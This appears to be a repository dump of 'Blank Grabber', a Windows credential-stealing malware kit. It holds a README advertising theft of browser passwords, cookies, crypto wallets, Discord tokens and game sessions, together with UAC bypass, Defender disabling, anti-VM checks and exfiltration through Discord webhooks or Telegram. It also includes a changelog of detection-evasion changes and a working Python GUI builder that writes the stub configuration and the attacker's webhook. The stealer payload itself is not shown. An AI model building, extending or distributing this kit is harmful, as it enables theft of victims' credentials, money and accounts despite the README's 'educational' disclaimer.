README.md
<h1 align="center">
   Blank Grabber
</h1>
<p align= "center">
   <kbd>
   <img  src="https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png">
   </kbd><br><br>
   <img src="https://img.shields.io/github/languages/top/Blank-c/Blank-Grabber">
   <img src="https://img.shields.io/github/stars/Blank-c/Blank-Grabber">
   <img src="https://img.shields.io/github/forks/Blank-c/Blank-Grabber">
   <br>
   <img src="https://img.shields.io/github/last-commit/Blank-c/Blank-Grabber">
   <img src="https://img.shields.io/github/license/Blank-c/Blank-Grabber">
   <br>
   <img src="https://img.shields.io/github/issues/Blank-c/Blank-Grabber">
   <img src="https://img.shields.io/github/issues-closed/Blank-c/Blank-Grabber">
   <br>
   <br>
   <img src="https://repobeats.axiom.co/api/embed/3183aa00d01f8636a5cbc17344c36168eff93aec.svg">
</p>

## Project Status: Coming to an End

Dear contributors and users,

I hope this message finds you all well. I wanted to take a moment to share an important update regarding this project.

Over the past year, we've worked together to build and improve this project. It has been an incredible journey, and I'm immensely grateful for all the contributions, feedback, and support from each one of you. This project has not only helped me improve my Python skills but has also been a great opportunity to explore and learn more about computer systems.

However, as the saying goes, all good things must come to an end. As I approach the final year of my school journey, I find myself needing to focus on my academic responsibilities and make room for new opportunities ahead. Therefore, I have decided to step back from actively maintaining this project.

I want to express my sincere appreciation to everyone who has participated in this project, be it through code contributions, issue reporting, or offering valuable insights. Your involvement has been the driving force behind the project's success.

I'm happy to announce that noahmajors, one of the contributors to this project, has taken the initiative to fork the repository and continue its development. You can find the active fork at the following link: https://github.com/f4kedre4lity/Blank-Grabber

I encourage you all to show your support to noahmajors and the new direction they will take the project. Please consider contributing to the fork if you are interested in its future development.

While this marks the end of my direct involvement with this project, I sincerely hope that the codebase and knowledge shared here will continue to benefit the community.

Thank you all once again for being part of this journey. I wish you all the best in your endeavors and hope our paths may cross again in the future.

Best regards,  
Blank-c

## Table of Contents

- [Download](#download)
- [Features](#features)
- [Stub Settings](#stub-settings)
- [Requirements](#requirements)
- [How to Build?](#how-to-build)
- [Support the Project](#support-the-project)

## Download

[![Download](https://img.shields.io/badge/Download-Now-Green?style=for-the-badge&logo=appveyor)](https://github.com/Blank-c/Blank-Grabber/archive/refs/heads/main.zip)

**Disclaimer:** This program is provided for educational and research purposes only. The creator of this program does not condone or support any illegal or malicious activity, and will not be held responsible for any such actions taken by others who may use this program. By downloading or using this program, you acknowledge that you are solely responsible for any consequences that may result from the use of this program.

**Note:** If the grabber fails to function, attempt rebuilding it without enabling the "Anti VM" option.

**Note 2:** To decrease the chances of detections, you can download [MingGW-w64 (with GCC)](https://github.com/niXman/mingw-builds-binaries/releases/download/13.1.0-rt_v11-rev1/x86_64-13.1.0-release-win32-seh-msvcrt-rt_v11-rev1.7z) and include the "bin" folder in the PATH variable.

## Features

    • GUI Builder.
    • UAC Bypass.
    • Custom Icon.
    • Runs On Startup.
    • Disables Windows Defender.
    • Anti-VM.
    • Blocks AV-Related Sites.
    • Melt Stub.
    • Fake Error.
    • EXE Binder.
    • File Pumper.
    • Obfuscated Code.
    • Discord Injection.
    • Steals Discord Tokens.
    • Steals Steam Session.
    • Steals Epic Session.
    • Steals Uplay Session.
    • Steals Passwords From Many Browsers.
    • Steals Cookies From Many Browsers.
    • Steals History From Many Browsers.
    • Steals Autofills From Many Browsers.
    • Steals Minecraft Session Files.
    • Steals Telegram Session Files.
    • Steals Crypto Wallets.
    • Steals Roblox Cookies.
    • Steals Growtopia Session.
    • Steals IP Information.
    • Steals System Info.
    • Steals Saved Wifi Passwords.
    • Steals Common Files.
    • Captures Screenshot.
    • Captures Webcam Image.
    • Sends All Data Through Discord Webhooks/Telegram Bot.
    (...more)

## Stub Settings

| Option | Description |
| ------ | ----------- |
| **Ping Me** | Pings [@everyone](https://www.remote.tools/remote-work/discord-everyone-here#what-is-everyone) when someone runs the stub. |
| **Anti VM** | Tries its best to prevent the stub from running on Virtual Machine. |
| **Put On Startup** | Runs the stub on Windows starup. |
| **Melt Stub** | Deletes the stub after use. |
| **Pump Stub** | Pumps the stub upto the provided size. |
| **Fake Error** | Create custom (fake) error. |
| **Block AV Sites** | Blocks AV related sites ([Unblock](https://github.com/Blank-c/Blank-Grabber/issues/117)). |
| **Discord Injection** | Puts backdoor on the Discord client for persistence. |
| **UAC Bypass** | Tries to get administrator permissions without showing any prompt. |

**Supports:** *Windows 8+ (Tested on Windows 10).*

## Requirements

**To build the stub, you need:**
- Windows 10.
- Python 3.10+.
- An active internet connection.

## How to Build?

1. Download and install [Python 3](https://www.python.org/downloads/) (Make sure to enable the *Add to PATH* option.)
2. Verify the installation by executing `python --version` in [CMD](https://www.howtogeek.com/235101/10-ways-to-open-the-command-prompt-in-windows-10/?).
3. [Download Blank Grabber](#download).
4. [Extract](https://www.pcworld.com/article/394871/how-to-unzip-files-in-windows-10.html#:~:text=Unzip%20all%20files%20in%20a%20ZIP%20file) the zip file.
5. Navigate to the **Blank Grabber** folder and double click *Builder.bat* file.
6. Fill in the fields of the builder and press the <kbd>Build</kbd> button.

[![Tutorial video](https://img.shields.io/badge/Watch-Tutorial-blue?style=for-the-badge&logo=youtube)](https://streamable.com/r9sa14)

## Support the Project

If you find this project useful and would like to show your support, you can make a donation using the following cryptocurrencies:

- **Bitcoin (BTC):**
  - Wallet Address: bc1quyf7d2cwrd0rgtyhtjt7ermxlw4hzg8npr4yce

- **Ethereum (ETH):**
  - Wallet Address: 0x54Ab5743141c781178863e3F658d48Cb9564f520

- **USDT (Tron network):**
  - Wallet Address: TJsixSZ9LDpn3ZNF8pEKmfNaNkMTrK1hWJ


changelog.md
# Changelog
### 02/08/2023
* Now prompts the user whether to run the bound file in startup or not.
* Renames entry point (may break unpackers).
* Fixed gcc flag for future PyInstaller update.

### 23/07/2023
* Added browsers' autofills data stealer.
* Now recompiles PyInstaller's bootloader if `gcc` is found.
* Changed the encryption of bound file from AES encryption to Reversed Zlib.
* Changed the default password of the archive to `blank123`.

### 16/07/2023
* Fixed GoFile uploader.
* Fixed the bug where data is not being sent when C2 is Telegram and the file size exceeds the upload limit.
* Now the builder copies all the required files to virtual environment on every build.

### 15/07/2023
* Now encrypts the bound executable.
* Now checks if defender blocked the file in case of UAC bypass.
* Readded the certificate and version file.

### 11/07/2023
* Now searches for Steam, Telegram and Growtopia directories from Start Menu.
* Changed configuration file from 'config.ini' to 'config.json'.
* Removed certificate and version file to reduce detections.

### 03/07/2023
* Added Growtopia session stealer.
* Removed tree file generated at the root of the archive.
* Added support for multi-word password of archive.

### 02/07/2023
* Fixed a bug in Uplay stealer which prevents the grabber from stealer from copying Uplay files.
* Removed SSL certificate check in builder.

### 01/07/2023
* Fixed 'AttributeError' in Discord injection.
* Fixed an issue where sometimes the stealer crashes while stealing system info to be attached with the stolen data.

### 29/06/2023
* Added Changelog.


Blank Grabber/builder.py
import tkinter as tk
from tkinter import ttk, messagebox, filedialog
from urllib.request import urlopen, Request
from socket import create_connection
import json, os, subprocess, shutil, webbrowser, ctypes

def ToggleConsole(choice):
	if choice:
		# Show Console
		ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 4)
	else:
		# Hide Console
		ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)

class Builder:
	def __init__(self):
		self.root = tk.Tk()
		self.iconFileData = bytes()
		self.boundFileData = bytes()
		self.PingME = tk.BooleanVar(self.root, True)
		self.VMprotect = tk.BooleanVar(self.root, True)
		self.BSOD = tk.BooleanVar(self.root, True)
		self.Startup = tk.BooleanVar(self.root, True)
		self.Destruct = tk.BooleanVar(self.root, True)
		self.blockSites = tk.BooleanVar(self.root, False)
		self.injectJS = tk.BooleanVar(self.root, True)
		self.MSGbox = tk.BooleanVar(self.root, False)
		self.MSGboxconf = dict()
		self.__main__()

	def __main__(self):
		self.root.title("Blank Grabber Builder")
		self.root.geometry("800x365")
		self.root.resizable(False, False)
		self.root['background'] = "black"
		self.root.bind("<Enter>", lambda event: self.WindowOpacity(event, 1))
		self.root.bind("<Leave>", lambda event: self.WindowOpacity(event, 0))
		self.root.bind("<Button-1>", lambda event: self.removeFocus(event))

		ttk.Label(text= "Blank Grabber", font= ("Franklin Gothic", 18, "bold"), foreground= "white", background= "black").place(relx= 0.5, anchor= "n")
		webhookEntry = ttk.Entry(self.root, foreground= "grey", background= "#303841")
		webhookEntry.insert(0, "Enter Webhook Here")
		webhookEntry.bind("<ButtonRelease-1>", lambda event: self.EntryHint(event, "Enter Webhook Here"))
		webhookEntry.bind("<FocusOut>", lambda event: self.EntryHint(event, "Enter Webhook Here"))
		webhookEntry.bind("<FocusIn>", lambda event: self.EntryHint(event, "Enter Webhook Here"))
		webhookEntry.place(x= 20, y= 60, height= 30, width= 750)
		testHook_button= tk.Button(self.root, text= "Test Webhook", command= lambda: self.testHook(webhookEntry.get()), background= "#303841", foreground= "white", activebackground= "#303841", activeforeground= "white", font= ("Franklin Gothic", 10, "bold"), width= 15)
		testHook_button.place(x = 770, anchor= "e", y= 110)
		PingME = tk.Checkbutton(self.root, text= "Ping Me", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.PingME)
		BSOD = tk.Checkbutton(self.root, text= "BSOD", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.BSOD)
		VMprotect = tk.Checkbutton(self.root, text= "VM Protect", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.VMprotect, command= lambda: self.ToggleBsod(BSOD))
		Startup = tk.Checkbutton(self.root, text= "Run On Startup", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.Startup)
		Destruct = tk.Checkbutton(self.root, text= "Delete Self", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.Destruct)
		blockSites = tk.Checkbutton(self.root, text= "Block AV Sites", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.blockSites)
		injectJS = tk.Checkbutton(self.root, text= "Discord Injection", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.injectJS)
		Messagebox = tk.Checkbutton(self.root, text= "Message Box", background= "black", foreground= "white", activebackground= "black", activeforeground= "white", selectcolor= "black", font= ("Franklin Gothic", 11), variable= self.MSGbox, command= self.MessageboxEvent)

		PingME.place(y = 100, x= 20)
		VMprotect.place(y = 130, x= 20)
		BSOD.place(y= 160, x= 20)
		Startup.place(y= 190, x= 20)
		Destruct.place(y= 220, x= 20)
		injectJS.place(y= 250, x= 20)
		blockSites.place(y= 280, x= 20)
		Messagebox.place(y= 310, x= 20)

		IconNameLabel = ttk.Label(background= "black", foreground= "white", font= ("Franklin Gothic", 10, "bold"), width= 15, anchor= "center")
		IconNameLabel.place(x= 560, y= 130, anchor= "e")
		IconNameLabel.bind("<ButtonRelease-1>", lambda event: self.unselectIcon(event))
		IconButton = tk.Button(text= "Select Icon", background= "#303841", foreground= "white", activebackground= "#303841", activeforeground= "white", width= "15", font= ("Franklin Gothic", 10, "bold"), command= lambda: self.selectIcon(IconNameLabel))
		IconButton.place(x= 560, y= 110, anchor= "e")

		BoundFileNameLabel = ttk.Label(background= "black", foreground= "white", font= ("Franklin Gothic", 10, "bold"), width= 15, anchor= "center")
		BoundFileNameLabel.place(x= 560, y= 200, anchor= "e")
		BoundFileNameLabel.bind("<ButtonRelease-1>", lambda event: self.unBind(event))
		BindButton = tk.Button(text= "Bind Executable", background= "#303841", foreground= "white", activebackground= "#303841", activeforeground= "white", width= "15", font= ("Franklin Gothic", 10, "bold"), command= lambda: self.BindFileSelect(BoundFileNameLabel))
		BindButton.place(x= 560, y= 180, anchor= "e")

		GithubButton = tk.Button(text= "Github", background= "#303841", foreground= "white", activebackground= "#303841", activeforeground= "white", width= "15", font= ("Franklin Gothic", 10, "bold"), command= lambda: webbrowser.open("https://github.com/Blank-c/Blank-Grabber", new= 2))
		GithubButton.place(x= 770, y= 180, anchor= "e")

		BuildButton = tk.Button(text= "Build", background= "#303841", foreground= "white", activebackground= "#303841", activeforeground= "white", width= "15", font = ("Franklin Gothic", 10, "bold"), command= lambda: self.Build(webhookEntry.get()))
		BuildButton.place(y= 260, x= 770, anchor= "e")

		self.root.mainloop()

	def Build(self, hook):
		def Exit(exitcode= 0):
			os.system("pause > NUL")
			os._exit(exitcode)

		def clear():
			os.system("cls")

		def format1(title, description= ""):
			return f"[{title}\u001b[0m] \u001b[37;1m{description}\u001b[0m"

		if not hook.startswith(("http://", "https://")):
			messagebox.showerror("Invalid Webhook", "The discord webhook you entered is invalid!")
			return
		if not self.checkInternetConnection():
			messagebox.showerror("Error", "Unable to connect to the internet!")
			return

	
		ToggleConsole(True)
		self.root.destroy()
		ctypes.windll.user32.FlashWindow(ctypes.windll.kernel32.GetConsoleWindow(), True )
		clear()

		if not os.path.isfile(os.path.join("env", "Scripts", "run.bat")):
			if not os.path.isfile(os.path.join("env", "Scripts", "activate")):
				print(format1("\u001b[33;1mINFO", "Creating virtual environment... (might take some time)"))
				res = subprocess.run("python -m venv env", capture_output= True, shell= True)
				clear()
				if res.returncode != 0:
					print('Error while creating virtual environment ("python -m venv env"): {}'.format(res.stderr.decode(errors= "ignore")))
					Exit(1)

			print(format1("\u001b[33;1mINFO", "Copying assets to virtual environment..."))
			for i in os.listdir(datadir := os.path.join(os.path.dirname(__file__), "Data")):
				if os.path.isfile(fileloc := os.path.join(datadir, i)):
					shutil.copyfile(fileloc, os.path.join(os.path.dirname(__file__), "env", "Scripts", i))
				else:
					shutil.copytree(fileloc, os.path.join(os.path.dirname(__file__), "env", "Scripts", i))
		with open(os.path.join(os.path.dirname(__file__), "env", "Scripts", "config.json"), "w", encoding= "utf-8", errors= "ignore") as file:
			if not self.MSGbox.get():
				self.MSGboxconf = dict()
			configuration = {
					"PINGME" : self.PingME.get(),
					"VMPROTECT" : self.VMprotect.get(),
					"BSOD" : self.BSOD.get(),
    				"STARTUP" : self.Startup.get(),
    				"DELETE_ITSELF" : self.Destruct.get(),
				    "BLOCK_SITES" : self.blockSites.get(),
				    "INJECT_JS" : self.injectJS.get(),
					"MSGBOX" : self.MSGboxconf
			}
			json.dump(configuration, file, indent= 4)
		clear()
		with open(os.path.join("env", "Scripts", "webhook.txt"), "w", encoding= "utf-8", errors= "ignore") as file:
			file.write(hook)
		os.chdir(os.path.join(os.path.dirname(__file__), "env", "Scripts"))
		if os.path.isfile("icon.ico"):
			os.rename("icon.ico", "icon.ico.old")
		if os.path.isfile("bound.exe"):
			os.rename("bound.exe", "bound.exe.old")
		if len(self.iconFileData):
			with open("icon.ico", "wb") as file:
				file.write(self.iconFileData)
		if len(self.boundFileData):
			with open("bound.exe", "wb") as file:
				file.write(self.boundFileData)
		os.startfile("run.bat")

	def checkInternetConnection(self):
		try:
			create_connection(("1.1.1.1", 53))
			return True
		except OSError:
			return False

	def selectIcon(self, FileNameLabel):
		filetypes = (
			("Icon File", ".ico"),
			)
		fileloc = filedialog.askopenfilename(title= "Select icon", initialdir= os.path.join(os.getenv("userprofile"), "Pictures"), filetypes= filetypes)
		if os.path.isfile(fileloc):
			with open(fileloc, "rb") as file:
				self.iconFileData = file.read()
			FileNameLabel['text'] = os.path.basename(fileloc)
	
	def BindFileSelect(self, FileNameLabel):
		filetypes = (
			("Executable File", ".exe"),
			)
		fileloc = filedialog.askopenfilename(title= "Select file", initialdir= ".", filetypes= filetypes)
		if os.path.isfile(fileloc):
			with open(fileloc, "rb") as file:
				self.boundFileData = file.read()
			FileNameLabel['text'] = os.path.basename(fileloc)

	def unselectIcon(self, event):
		event.widget['text'] = str()
		self.iconFileData = bytes()

	def unBind(self, event):
		event.widget['text'] = str()
		self.boundFileData = bytes()

	def ToggleBsod(self, BSOD):
		if not self.VMprotect.get():
			BSOD["state"] = "disabled"
			self.BSOD.set(False)
		else:
			BSOD["state"] = "normal"
			self.BSOD.set(True)

	def removeFocus(self, event):
		if not isinstance(event.widget, ttk.Entry):
			self.root.focus()

	def testHook(self, hook):
		if not hook.startswith(("http://", "https://")):
			messagebox.showerror("Invalid Webhook", "The discord webhook you entered is invalid!")
			return
		if not self.checkInternetConnection():
			messagebox.showerror("Error", "Unable to connect to the internet!")
			return
		data = json.dumps({"content" : "Your webhook is working!"})
		req = Request(url= hook, data= data.encode(), method= "POST", headers= {"Content-Type" : "application/json", "user-agent" : "Mozilla/5.0 (Linux; Android 10; SM-T510 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.159 Safari/537.36"})
		try:
			if (status := urlopen(req).status) == 204:
				messagebox.showinfo("Working", "Your webhook is working!")
			else:
				raise Exception()
		except Exception:
			messagebox.showwarning("Warning", "It looks like your webhook is not working!")
	
	def MessageboxEvent(self):
		if not self.MSGbox.get():
			return
		
		newwindow = tk.Toplevel()

		ICONS = {"Stop Mark" : 16, "Question Mark" : 32, "Exclamation Mark" : 48, "Information Mark" : 64}
		BUTTONS = {"OK" : 0, "OK and CANCEL" : 1, "ABORT, RETRY and IGNORE" : 2, "YES, NO and CANCEL" : 3, "YES and NO" : 4, "RETRY and CANCEL" : 5}

		def onClose():
			if not bool(self.MSGboxconf):
				self.MSGbox.set(False)
			newwindow.destroy()

		newwindow["background"] = "black"
		newwindow.grab_set()
		newwindow.resizable(False, False)
		newwindow.protocol("WM_DELETE_WINDOW", onClose)
		newwindow.title("Create message box")
		newwindow.geometry("700x300")

		titleEntry = ttk.Entry(newwindow, foreground= "grey", background= "#303841", )
		titleEntry.insert(0, "Title Here")
		titleEntry.bind("<ButtonRelease-1>", lambda event: self.EntryHint(event, "Title Here"))
		titleEntry.bind("<FocusOut>", lambda event: self.EntryHint(event, "Title Here"))
		titleEntry.bind("<FocusIn>", lambda event: self.EntryHint(event, "Title Here"))
		titleEntry.place(x= 5, y= 20, height= 30, width= 685)

		messageEntry = ttk.Entry(newwindow, foreground= "grey", background= "#303841")
		messageEntry.insert(0, "Message Here")
		messageEntry.bind("<ButtonRelease-1>", lambda event: self.EntryHint(event, "Message Here"))
		messageEntry.bind("<FocusOut>", lambda event: self.EntryHint(event, "Message Here"))
		messageEntry.bind("<FocusIn>", lambda event: self.EntryHint(event, "Message Here"))
		messageEntry.place(x= 5, y= 60, height= 30, width= 685)

		ttk.Label(newwindow, text= "Icon:", background= "black", foreground= "white", font= ("Franklin Gothic", 10, "bold"), width= 15, anchor= "center").place(x= 5, y= 120)

		iconBox = ttk.Combobox(newwindow, values= list(ICONS.keys()), justify= "center", state= "readonly")
		iconBox.current(3)
		iconBox.place(x= 80, y= 120)

		ttk.Label(newwindow, text= "Button:", background= "black", foreground= "white", font= ("Franklin Gothic", 10, "bold"), width= 15, anchor= "center").place(x= 450, y= 120)

		buttonBox = ttk.Combobox(newwindow, values= list(BUTTONS.keys()), justify= "center", state= "readonly")
		buttonBox.current(0)
		buttonBox.place(x= 530, y= 120)

		testButton = tk.Button(newwindow, text= "Test", background= "#303841", foreground= "white", activebackground= "#303841", activeforeground= "white", width= "15", font = ("Franklin Gothic", 10, "bold"), command= lambda: self.MessageBoxTest(iconBox, buttonBox, ICONS, BUTTONS, titleEntry, messageEntry))
		testButton.place(x= 540, y= 200, anchor= "w")

		SaveButton = tk.Button(newwindow, text= "Save", background= "#303841", foreground= "white", activebackground= "#303841", activeforeground= "white", width= "15", font = ("Franklin Gothic", 10, "bold"), command= lambda: self.MessageBoxSave(newwindow, iconBox, buttonBox, ICONS, BUTTONS, titleEntry, messageEntry))
		SaveButton.place(x= 90, y= 200, anchor= "w")
	
	def MessageBoxSave(self, window, iconbox, buttonbox, ICONS, BUTTONS, titlebox, messagebox):
		config = {
			"title" : titlebox.get(),
			"message" : messagebox.get(),
			"icon" : ICONS[iconbox.get()],
			"buttons" : BUTTONS[buttonbox.get()]
		}

		self.MSGboxconf = config
		self.MSGbox.set(True)
		window.destroy()

	def MessageBoxTest(self, iconbox, buttonbox, ICONS, BUTTONS, titlebox, messagebox):
		config = {
			"title" : titlebox.get(),
			"message" : messagebox.get(),
			"icon" : ICONS[iconbox.get()],
			"buttons" : BUTTONS[buttonbox.get()]
		}

		self.messagebox(config)

	def messagebox(self, config):
		title = config.get("title")
		message = config.get("message")
		icon = config.get("icon")
		buttons = config.get("buttons")

		if not all(x is not None for x in (title, message, icon, buttons)):
			return
        
		title = title.replace("\x22", "\\x22").replace("\x27", "\\x22")
		message = message.replace("\x22", "\\x22").replace("\x27", "\\x22")
        
		cmd = f'''mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('{message}', 0, '{title}', {icon}+{buttons});close()"'''
		subprocess.Popen(cmd, shell= True, creationflags= subprocess.SW_HIDE | subprocess.CREATE_NEW_CONSOLE)

	def WindowOpacity(self, event, mode):
		if not isinstance(event.widget, tk.Tk):
			return
		if mode:
			self.root.attributes("-alpha", 1.0)
		else:
			self.root.attributes("-alpha", 0.7)

	def EntryHint(self, event, text):
		choice = int(event.type)
		if choice in (5, 9):
			if str(event.widget["foreground"]) == "grey":
				event.widget["foreground"] = "black"
				event.widget.delete(0, "end")
		elif choice == 10:
			if str(event.widget["foreground"]) == "black" and not len(event.widget.get()):
				event.widget["foreground"] = "grey"
				event.widget.insert(0, text)

if __name__ == "__main__":
	if os.name == "nt":
		if not os.path.isdir(os.path.join(os.path.dirname(__file__), "Data")):
			subprocess.Popen('mshta "javascript:var sh=new ActiveXObject(\'WScript.Shell\'); sh.Popup(\'Data folder cannot be found. Please redownload the files!\', 10, \'Error\', 16);close()"', shell= True, creationflags= subprocess.SW_HIDE | subprocess.CREATE_NEW_CONSOLE)
			os._exit(1)
		ToggleConsole(False)
		Builder()
	else:
		print("Only Windows OS is supported!")
